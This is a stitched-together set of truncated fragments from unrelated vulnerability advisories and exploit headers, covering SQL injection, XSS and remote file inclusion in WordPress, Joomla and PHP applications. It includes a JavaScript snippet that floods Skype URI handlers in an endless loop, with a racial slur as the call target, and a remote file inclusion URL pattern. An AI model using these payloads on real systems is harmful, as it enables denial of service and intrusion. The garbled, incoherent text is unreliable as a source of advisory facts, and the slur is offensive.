* Exploit Title: WordPress Plugin event-registration 6.02.02: SQL-Injection and
persistent XSS
* Discovery Date: 2016/03/13
* Public Disclosure Date: 2016/05/09
* Exploit Author: Michael Helwig
* Contact: https://twitter.com/c0dmtr1x | https://codemetrix.net
* Vendor Homepage:
* Exploit Title: Multiple (persistent) XSS in ProjectSend
* Discovery Date: 2016/02/19
* Public Disclosure Date: 2016/03/17
* Exploit Author: Michael Helwig
* Contact: https://twitter.com/c0dmtr1x
* Project Homepage: http://www.projectsend.org/
* Software Link:
* Exploit Title: Multiple Vulnerabilities in SP Projects & Document Manager
* Discovery Date: 2016/01/13
* Public Disclosure Date: 2016/03/06
* Exploit Author: Michael Helwig
* Contact: https://twitter.com/c0dmtr1x
* Vendor Homepage: http://smartypantsplugins.com/
* Software Link:
1. Skype and Internet Explorer uri handler mechanism memory resources
consumption bug:
script
for (var x = 1; x = 666; x++)
{
popup_window = window.open('skype:happy_negro?call');
popup_window.close ();
}
/script
This will invoke many skype.exe processes and as they are not closed -
A new 1.01.04 firmware for the Linksys WAG200G seems to correct this security
problem.
Firmware 1.01.04 (04/04/2007) :
- Fixes issue with incorrect upstream/downstream transmit power display on DSL
Connection page
- Fixes issue with ATT VPN client not connecting to ATT VPN network
- Fixes
://hackberry.ath.cx
mail[AT]hackberry.ath.cx
Vulnerability:
http://[target]/?id=[REMOTEFILE]
Google dork:
[ Request us to play you a song ]
Unless otherwise demonstrated, this report is fake. We have never been contacted
by this person and apart from an invalid workaround, there is also no actual
mention of how this DOS is achieved, let alone mentioning that it's based on
IIS so in principle could affect IIS itself and not only
#SolpotCrew
Community
#
# com_trade Remote File Inclusion (mosConfig_absolute_path)
#
# original advisory : http://solpotcrew.org/adv/BlueSpy-adv-com_trade.txt
#
#SolpotCrew
Community
#
# Com Multibanners Remote File Inclusion (mosConfig_absolute_path)
#
# original advisory : http://solpotcrew.org/adv/BlueSpy-adv-multibanners.txt
#
Advisory : Cross Site Scripting in Seditio (http://www.neocrome.net)
Release Date : 24/05/2005
Last Modified : 24/05/2005
Author: Yunus Emre Yilmaz ( http://yns.zaxaz.com)
Application : Seditio v102 ( maybe older versions)
Risk : Critical
Problem :
Ldu's
Advisory : Cross Site Scripting in Boastmachine (http://boastology.com/)
Release Date : 17/05/2005
Last Modified : 17/05/2005
Author: Yunus Emre Yilmaz ( http://yns.zaxaz.com)
Application : BoastMachine v3.1 ( maybe older versions)
Risk : High
Problem : Form action
- Advisory: EJ3 TOPo Cross Site Scripting Vulnerability
- Author: Yunus Emre Yilmaz || Yns [EMAIL PROTECTED]
- Application: EJ3 TOPo ( http://ej3soft.ej3.net )
- Affected Version : v2.2.178 ( maybe older versions..)
- Risk : Critical
Details : If an attacker accesses /code/inc_header.php
- Advisory: PEHEPE Membership Management System Multiple Vulnerabilities
- Author: Yunus Emre Yilmaz -- mail[at]yunusemreyilmaz(dot)com
- Application: PEHEPE MemberShip Management System
(http://www.pehepe.org/UYELİK3)
- Affected Version : v3 ( maybe older versions..)
- Risk : Critical